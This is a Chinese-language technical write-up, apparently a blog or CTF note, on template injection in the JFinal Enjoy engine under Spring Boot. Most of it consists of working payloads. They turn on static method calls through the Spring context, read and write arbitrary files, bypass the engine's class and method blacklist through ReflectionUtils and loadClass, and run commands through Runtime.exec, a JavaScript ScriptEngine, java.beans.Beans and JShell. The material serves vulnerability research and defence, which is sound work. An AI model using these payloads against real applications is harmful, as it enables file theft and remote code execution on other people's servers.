Enjoy模板引擎是国产框架JFinal配套的,文档👉https://jfinal.com/doc/6-1
文档中声称“在模板中可以直接与 java 代码通畅地交互”
这对安全人员来说可是狂喜。大概过一遍文档,有几个值得注意的点
和其他模板引擎一样,为了方便开发时的调试以提高开发效率,Enjoy支持模板热加载,也就是不对模板解析结果进行缓存,每次都会重新读取模板文件来编译,通过如下配置
engine.setDevMode(true);
EL表达式也支持点号调用getter特性
field表达式取值优先次序,以user.name为例:
若 user.getName() 存在,则优先调用
user 具有 public 修饰的 name 属性,则取 user.name 属性值
user 为Model、Record、Map的子类,调用 user.get("name")
jfinal 5.0.2之后,默认”未启用“,需要添加如下配置
engine.setStaticFieldExpression(true);
engine.setStaticMethodExpression(true);
类名 + :: + 方法名(参数)
#()直接回显里面的表达式内容
#set(x=yyyy) 对变量进行赋值
#include("../../flag")
#render("../../flag")
可以用这个直接读文件,传入的是相对模板目录的路径,跟less的@import(inline) "../../flag"一样
这里使用目前最新版本5.1.3
<dependency>
<groupId>com.jfinal</groupId>
<artifactId>enjoy</artifactId>
<version>5.1.3</version>
</dependency>
开启静态方法调用
SpringBoot整合Enjoy模板引擎
@Configuration
public class SpringBootConfig {
@Bean(name = "jfinalViewResolver")
public JFinalViewResolver getJFinalViewResolver() {
JFinalViewResolver jfr = new JFinalViewResolver();
jfr.setSuffix(".html");
jfr.setContentType("text/html;charset=UTF-8");
jfr.setOrder(0);
jfr.setSessionInView(false);
Engine engine = JFinalViewResolver.engine;
engine.setDevMode(true);
engine.setToClassPathSourceFactory();
return jfr;
}
}
发现JFinalViewResolver是AbstractTemplateViewResolver的子类,这个模板视图解析抽象类对应的另一个类,AbstractTemplateView会在Model中放入一个Spring的宏变量。
WebApplicationContext不仅可以获取到ServletContext的引用,还可以获取到spring上下文,即可以访问到AOP容器中注册的Bean。
通过springMacroRequestContext获取注册的JFinalViewResolver,刚好其engine是public属性,拿到后再调用其public方法setStaticMethodExpression
#(springMacroRequestContext.webApplicationContext.getBean('jfinalViewResolver').engine.setStaticMethodExpression(true))
#(springMacroRequestContext.webApplicationContext.getBean('jfinalViewResolver').engine.setStaticFieldExpression(true))
黑名单绕过
静态方法调用前有个WAF,设置了类和方法的黑名单
把大部分常见的类和方法都禁掉了,但难免有漏网之鱼
读文件
#set(x=com.sun.org.apache.xml.internal.security.utils.JavaUtils::getBytesFromFile('/flag'))
#((java.util.Base64::getEncoder()).encodeToString(x))
写文件
#set(x="hacked".getBytes())
#set(y=(java.util.Base64::getDecoder()).decode('YWFhYQ=='))
#(com.sun.org.apache.xml.internal.security.utils.JavaUtils::writeBytesToFilename('/tmp/success',y))
清除黑名单
过滤了removeForbiddenClass和removeForbiddenMethod这两个方法,很容易想到通过反射来绕过,但同样invoke、Method也被过滤了,调用不了Method#invoke。Enjoy模板一般会搭配SpringBoot来使用,而SpringBoot内置了许多工具类,其中就有一个ReflectionUtils,封装了一系列反射有关的方法。
public static Method findMethod(Class<?> clazz, String name, @Nullable Class<?>... paramTypes)
public static Object invokeMethod(Method method, @Nullable Object target, @Nullable Object... args)
完美绕开了Enjoy模板的黑名单
但还有一个问题,就是这里的参数需要为Class对象,forName、Class、ClassLoader、Thread等获取Class对象相关方法和类都被禁了,唯独没有禁loadClass,那我们只要拿到一个ClassLoader对象就能获取到Class对象了。不能实例化对象,只能通过静态方法来获取。主要有下面两种方法拿到ClassLoader对象
// ClassLoader.getSystemClassLoader()
URLClassLoader.getSystemClassLoader()
Thread thread = Thread.currentThread();
ClassLoader contextClassLoader = thread.getContextClassLoader();
第二种显然不行,Thread被ban了。
拿到后再调用loadClass来获取Class对象
#set(methodKit=(java.net.URLClassLoader::getSystemClassLoader()).loadClass("com.jfinal.template.expr.ast.MethodKit"))
#set(runTime=(java.net.URLClassLoader::getSystemClassLoader()).loadClass("java.lang.Runtime"))
#set(clazz=(java.net.URLClassLoader::getSystemClassLoader()).loadClass("java.lang.Class"))
#set(meth=org.springframework.util.ReflectionUtils::findMethod(methodKit,'removeForbiddenClass',clazz))
#(org.springframework.util.ReflectionUtils::invokeMethod(meth,null,runTime))
#((java.lang.Runtime::getRuntime()).exec('calc'))
js RCE
com.jfinal.kit.ReflectKit#newInstance能够实例化一个类
public static Object newInstance(Class<?> clazz) {
try {
return clazz.newInstance();
} catch (ReflectiveOperationException e) {
throw new RuntimeException(e);
}
}
#set(clazz=(java.net.URLClassLoader::getSystemClassLoader()).loadClass("javax.script.ScriptEngineManager"))
#set(engine=com.jfinal.kit.ReflectKit::newInstance(clazz))
#(engine.getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec("calc")'))
好吧,高高兴兴地发现了一个可以用的方法,因为方法名被ban了。。。
后面找到了JDK自带的一个类java.beans.Beans
instantiate首先会把类名当成序列化对象,加上.ser后缀,ClassLoader.getSystemResourceAsStream获取后进行反序列化。
或找不到序列化对象,再尝试直接实例化类。
#set(engine=java.beans.Beans::instantiate(null, "javax.script.ScriptEngineManager"))
#(engine.getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec("calc")'))
JShell RCE
JDK9引入jdk.jshell.JShell
#((jdk.jshell.JShell::create()).eval('Runtime.getRuntime().exec("calc")'))
